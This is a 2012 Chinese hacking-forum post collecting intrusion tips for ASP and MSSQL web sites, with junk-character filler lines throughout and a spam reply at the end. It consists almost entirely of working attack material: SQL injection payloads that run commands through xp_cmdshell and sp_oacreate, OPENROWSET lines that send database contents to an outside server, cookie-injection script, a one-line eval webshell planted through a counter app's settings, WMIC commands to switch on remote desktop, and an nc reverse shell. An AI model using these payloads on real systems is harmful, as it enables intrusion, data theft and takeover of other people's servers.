找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3649|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
( y0 J9 |: D" N* \" ?# d1 |1 ^9 d4 v/ p0 Z
6 T! r( Q5 ~1 b. o' b; Y5 K: V
SA点数据库分离搞法+语句:
6 o* L6 a* P' z' E
2 B& j( C$ ^; X8 O6 v注射点不显错,执行下面三条语句页面都返回正常。3 Y5 \0 k0 v' c/ ?# n  ~# Q3 p7 K7 U* o
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')  E: T# e$ x4 W
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')* K; K7 O( d# Z5 T3 K
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
* v7 x( d) u! O$ D% r! v+ w3 s可以列目录,判断系统为2000,web与数据库分离# \$ [0 f! y$ P, T. o
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。! l# B/ d& y4 X' y  C  ]
在注射点上执行
# Q6 o3 r" A% _3 v1 sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--/ Q, q% r; W& F6 ]
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
$ k  o& w% N2 y- y% ^. V还有我用NC监听得其他端口都没有得到IP。
5 _0 ?- U) @7 Y7 _6 d6 p2 P% w+ G% P8 K0 B4 S% v
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
2 G1 M( o4 V' `5 W2 y6 G/ w'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
( Z( D4 s- J0 K- e! A
9 g" Y1 F1 K( S$ A* B' L- s;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
; G1 d/ |& ]! b  f4 r9 z; o; I4 @4 p: v) L8 O) ?6 a" f, N
现在就猜想是不是数据库是内网而且不能连外网。) X7 N& W2 }( W  c( ]

; W' D$ ^% a9 W7 A+ I* s& O) \( a
/ A8 C1 W  ~7 M  h& M( w0 ]* Y' Jaccess导出txt文本代码
& b, k$ z. V9 u" u0 Q$ u; SSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
+ ?) W! `# ^  k2 i% n2 ]3 ^
. b2 W) x: }! G2 H
5 q/ ~/ n1 _  o6 R# b  i( G
/ Y) r+ w7 F, T2 Y自动跳转到指定网站代码头0 L6 P5 m1 d2 T- U
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
0 H+ K  E; O  Z& S
- Y! Y7 T5 f2 L: X
  z& E0 L0 @4 _# H: i* [入侵java or jsp站点时默认配置文件路径:( z* |# X0 d( i* [8 T
\web-inf\web.xml
5 l" M# `3 O) H% otomcat下的配置文件位置:
5 P/ y& _, d9 a6 s( o\conf\server.xml            (前面加上tomcat路径)
% }/ O$ z7 p/ D\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
4 g1 X7 M* z0 u. x" K; I# R5 D
; e- Q6 g) j- f6 n3 C2 Y. y5 w, G5 N$ F) h5 I  t+ Y( i( T6 H: {$ c0 S6 y2 J
9 @& G; s' D3 `0 m. i2 z
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:# C4 x4 H2 F7 n  P4 N% r( u. o+ x
-1%231 [+ g' O5 h% o: Z( J3 |; r4 z
> 8 [! w# \0 ~' T& L: b: Y
<
& i. d2 S* @4 Q  z9 A* f1'+or+'1'='1
' C+ H" t& n$ P* i7 ^( Did=8%bf
3 A$ r1 {4 R  u& b
3 V2 V4 g7 Z' |$ j, G+ h全新注入点检测试法:
1 S9 M4 N* Y) C4 D$ E在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
! `6 O4 m4 X) D8 E( X, e- \
, c8 N* b9 {' e( D在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。) x. @# w& B. D) Q
2 X1 s6 u( H, w  t. u4 n' r0 b
搜索型注入判断方法:4 q: x! F2 ]6 g# y; T
北京%' and '1'='1' and '%'='
/ ~* I6 i/ k, E/ O4 v北京%' and '1'='2' and '%'='
( f- [% S2 c. A: ]# l  V
9 P+ w0 j1 Y7 \3 l7 d, ^+ b# R/ Q% L- H7 h
COOKIES注入:
6 V3 [! H6 O' K- n' G; r! U  T# B
& z0 n; t0 q' f' y+ r% ujavascript:alert(document.cookie="id="+escape("51 and 1=1"));( O( v1 F3 X) a
$ p' y! |; t  Y; i+ w  J: I$ W* f% B
2000专业版查看本地登录用户命令:0 ^; \; u( Y3 O! P; k
net config workstation" X( k3 [- u) I3 J- ~3 u) y1 }

6 D7 _7 x# ?  b" \; m$ B/ W+ b% m
2003下查看ipsec配置和默认防火墙配置命令:
) f! w+ n5 `, ]; i. ]% c$ i0 pnetsh firewall show config+ Y% a' f) o1 N. J- e
netsh ipsec static show all  F/ Z, ?5 x, Y' N% v0 O4 h

( P6 S: a3 L, A5 y: t3 E, M3 ]+ m; S( p不指派指定策略命令:# k; H5 `& X: w3 b2 K: g9 }
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名). s, r# O+ A2 c. u
netsh ipsec static show policy all  显示策略名
5 Z" P, V5 t9 ^& l0 b9 U- D6 T
1 R3 V7 L# Z* J6 F# j+ |+ r" G: A8 F! g; O6 i( e6 Q6 S$ B2 f2 n9 a% I( w
猜管理员后台小技巧:
0 H+ o4 u6 w, w; n; Y( R8 y3 b9 L9 tadmin/left.asp
6 _4 b4 h' O. a% Q- v4 d7 l- r5 Wadmin/main.asp' ^4 H3 I. k$ j+ F* {+ p3 }+ a! `5 b
admin/top.asp
2 ?  p) y. c8 B8 \0 q- aadmin/admin.asp
2 [* M8 _# [5 N9 j% T# s会现出菜单导航,然后迅雷下载全部链接
& i7 U& }+ x& P4 G. l& g9 s3 S/ W/ c. o0 @- @2 B

* j! o0 @0 Q- j/ \8 f社会工程学:
& ^5 \* L8 S5 c- B  l用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人' c% |' n" U3 O- y5 u9 Z
然后去骗客服
' k& l; @" A, W7 H( P
* v5 [& o' a2 h! J3 a7 T7 p% P* H" m0 O( I' o$ b
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . k  d( l, _% K! Y) o) b8 A
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
. c4 a* h* z0 E  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。$ I. I1 X* q( `( D3 b

  X/ \; W" @, ?$ ?
- w9 Z0 {, Q, v8 T! ^/ H0 K
' F: g& \6 ~/ R6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)! ]& n% m9 |0 \4 T/ P3 e
7 k1 m7 R- V. Y

, {! r) a4 |5 U8 A% j; J$ p( }1 D; U% [
CMD加密注册表位置9 @& @% }% Z; q& b, s& ]
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor/ e- a) U1 P6 J0 b- |% w3 @' H& D: V
AutoRun2 g) G0 o+ Q7 l1 o  M

1 K( U# |) x( _. |(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
; e: ?" m* V8 g# FAutoRun
- q# Z; O) u- \' l' b# Q% t1 b" F$ T) x" \2 T) M1 X* }. B. `
+ M9 ^) w* d8 @6 v6 G
在找注入时搜索Hidden,把他改成test& w: _; o/ d, |1 o( \$ M
1 p  F$ \1 G" @3 W. M) h- l+ G

/ ^8 w" ]2 v/ J8 w. I8 E
6 d0 ?8 b1 J0 z- g. l5 T. Smstsc /v:IP /console
3 Z- f$ Z7 W* T5 \6 V* Y* |! q
+ a9 V  @& g, o$ \$ I5 ]% a0 `% B: J5 Z8 G0 S% [1 q; E4 h
一句话开3389:& {0 m4 A+ R0 ]8 w6 y2 `) u

% t/ _+ P/ U! g, ^4 z4 v4 P: m# o最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ' b' h/ y& G9 h/ n( }* ~4 A
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.2 g/ V; C1 O1 [  O: k! ^' ?

/ V. q5 S( ?/ D; [
6 _# ^, U' T& w1 w; w知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
% b, a+ i3 g* g* Q) zInsert into admin(user,pwd) values('test','test')
9 w% X  F% y; E# q7 v7 c. H
) z4 E  f7 \& [" p8 f- f8 W) }  t
NC反弹
4 u6 n, z1 ]9 D5 S  }先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   # l' @8 O" A2 E% y5 h3 @) o  N
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
/ }; s& `/ z+ d$ U/ \% R' O# j" r( m  \; Z

2 _: U5 S7 L& k- l5 K8 Q  c在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
( J' x' J$ g1 \: @  {& ^/ ?/ R6 F8 p
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
, Y! T- o& e8 g例如:9 K. w2 q7 S0 q: b( e0 D$ e
subst k: d:\www\ 用d盘www目录替代k盘
. l: n' K; ^" M8 |0 Bsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表